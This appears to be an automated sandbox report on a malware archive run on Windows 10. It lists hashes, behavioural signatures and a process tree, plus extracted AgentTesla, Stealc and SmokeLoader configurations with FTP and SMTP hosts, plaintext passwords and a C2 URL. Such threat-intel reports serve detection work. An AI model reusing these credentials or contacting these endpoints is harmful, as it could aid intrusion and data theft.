Analysis
-
max time kernel
571s -
max time network
1000s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
07-11-2023 00:46
Static task
static1
General
-
Target
Threats.zip
-
Size
198.9MB
-
MD5
5531fa3d683438d9be9b6e188b982bc6
-
SHA1
f2519749c63255116cc7c504ee5fd614896546de
-
SHA256
cf704d2a78521cb10affd3324aa84c2fcb3818da32ab8ae9a05b298f9cdf3176
-
SHA512
85bf738f5a5d8c5cf01cb2de70322e4c94167bcc300d880a46b8d1ea25f8963ef460143c19223fa91ecf3669636701ba97c416e029f6781375644878f0f31b8e
-
SSDEEP
3145728:EBRHVJvKCSZKO1bt5dVqsvB7heBlyIb4R6Xq7DpAlAR8bpWBZInYQnIs:GNy5J5dcme3Urpb0eyYA
Malware Config
Extracted
Protocol: ftp- Host:
peruglobo.com - Port:
21 - Username:
[email protected] - Password:
YSw&oCV&c23w
Extracted
Protocol: smtp- Host:
mail.hhipune.com - Port:
587 - Username:
[email protected] - Password:
c@c1r2e3
Extracted
stealc
http://robertjohnson.top
-
url_path
/e9c345fc99a4e67e.php
Extracted
smokeloader
pub3
Extracted
agenttesla
Protocol: ftp- Host:
ftp://peruglobo.com - Port:
21 - Username:
[email protected] - Password:
YSw&oCV&c23w
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS4FBEF1C1\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS88B00C82\libzip.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS04FA3A63\libcurl.dll aspack_v212_v242 -
Executes dropped EXE 2 IoCs
Processes:
famudit.exe_isC2F6.exepid process 1928 famudit.exe 6120 _isC2F6.exe -
Uses the VBS compiler for execution 1 TTPs
-
Processes:
resource yara_rule behavioral1/memory/6380-6324-0x0000000000140000-0x00000000009A2000-memory.dmp vmprotect behavioral1/memory/6380-6692-0x0000000000140000-0x00000000009A2000-memory.dmp vmprotect -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 488 api.ipify.org 522 icanhazip.com 557 api.ipify.org 578 api.ipify.org 583 api.ipify.org 598 api.ipify.org 474 ip-api.com 484 api.ipify.org -
Program crash 42 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process 6644 1804 WerFault.exe 1748 6548 WerFault.exe 2bee29bac294615a9d1b613ba775972cda26781938e3ae3aa60ad9737f1fbde8.exe 7240 6456 WerFault.exe 5eff7e99184b9c8352125aaf8aa9d72e33049c52dc4eb7a69d509da3e7004cb2.exe 1532 4540 WerFault.exe Wed07383feb8d.exe 6436 4540 WerFault.exe Wed07383feb8d.exe 7080 4540 WerFault.exe Wed07383feb8d.exe 8036 1368 WerFault.exe 8ce95aee92cffc56420902fa657bc82a44574450ada63eb864d11e404a59a078.exe 5400 4540 WerFault.exe Wed07383feb8d.exe 7508 7532 WerFault.exe setup_install.exe 5028 6256 WerFault.exe AddInProcess32.exe 5628 4540 WerFault.exe Wed07383feb8d.exe 7536 4540 WerFault.exe Wed07383feb8d.exe 6996 4708 WerFault.exe 3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe 5648 4540 WerFault.exe Wed07383feb8d.exe 1688 4540 WerFault.exe Wed07383feb8d.exe 8044 3552 WerFault.exe Mon107ce740ef0.exe 5580 4540 WerFault.exe Wed07383feb8d.exe 2240 5884 WerFault.exe Mon1064e3e790b.exe 5680 4540 WerFault.exe Wed07383feb8d.exe 2952 5884 WerFault.exe Mon1064e3e790b.exe 6748 4540 WerFault.exe Wed07383feb8d.exe 7692 5884 WerFault.exe Mon1064e3e790b.exe 6836 4540 WerFault.exe Wed07383feb8d.exe 1532 5884 WerFault.exe Mon1064e3e790b.exe 4456 5884 WerFault.exe Mon1064e3e790b.exe 4180 4540 WerFault.exe Wed07383feb8d.exe 5936 5884 WerFault.exe Mon1064e3e790b.exe 7540 4540 WerFault.exe Wed07383feb8d.exe 5300 5884 WerFault.exe Mon1064e3e790b.exe 5632 4540 WerFault.exe Wed07383feb8d.exe 5980 5884 WerFault.exe Mon1064e3e790b.exe 1692 4540 WerFault.exe Wed07383feb8d.exe 7608 5884 WerFault.exe Mon1064e3e790b.exe 4544 5884 WerFault.exe Mon1064e3e790b.exe 3448 5884 WerFault.exe Mon1064e3e790b.exe 5164 5884 WerFault.exe Mon1064e3e790b.exe 1416 5884 WerFault.exe Mon1064e3e790b.exe 7508 7280 WerFault.exe setup_install.exe 4572 5584 WerFault.exe setup_install.exe 3656 7828 WerFault.exe Wed22f19243a34ff2.exe 5544 5832 WerFault.exe Wed22f19243a34ff2.exe 6336 7428 WerFault.exe 61a764045daabe15243e13405d418e3f60b6671ee7a1e325c6021204920f741c.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2756 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 1920 tasklist.exe 7576 tasklist.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
chrome.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 6384 taskkill.exe 5692 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133437920861486538" chrome.exe -
Modifies registry class 2 IoCs
Processes:
firefox.exechrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2231940048-779848787-2990559741-1000\{C8681A70-F07E-4A7F-A5D2-F1C625A03DA5} chrome.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exechrome.exemsedge.exetaskmgr.exepid process 2476 msedge.exe 2476 msedge.exe 3568 msedge.exe 3568 msedge.exe 2804 identity_helper.exe 2804 identity_helper.exe 4160 chrome.exe 4160 chrome.exe 6220 msedge.exe 6220 msedge.exe 6220 msedge.exe 6220 msedge.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 7052 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes:
msedge.exechrome.exepid process 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
firefox.exechrome.exetaskmgr.exedescription pid process Token: SeDebugPrivilege 3040 firefox.exe Token: SeDebugPrivilege 3040 firefox.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeDebugPrivilege 7052 taskmgr.exe Token: SeSystemProfilePrivilege 7052 taskmgr.exe Token: SeCreateGlobalPrivilege 7052 taskmgr.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe Token: SeCreatePagefilePrivilege 4160 chrome.exe Token: SeShutdownPrivilege 4160 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exefirefox.exechrome.exetaskmgr.exepid process 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exefirefox.exechrome.exetaskmgr.exepid process 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3568 msedge.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 4160 chrome.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe 7052 taskmgr.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
firefox.exepid process 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe 3040 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3568 wrote to memory of 4600 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4600 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 4172 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2476 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2476 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe PID 3568 wrote to memory of 2900 3568 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Threats.zip1⤵PID:4260
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb506d46f8,0x7ffb506d4708,0x7ffb506d47182⤵PID:4600
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2476 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:22⤵PID:4172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:82⤵PID:2900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:12⤵PID:4024
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:12⤵PID:4648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:12⤵PID:3244
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:12⤵PID:4052
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:82⤵PID:4504
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2804 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:12⤵PID:3440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:12⤵PID:3804
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:12⤵PID:1616
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,8497270745169048893,14195027360218201043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:2412
-
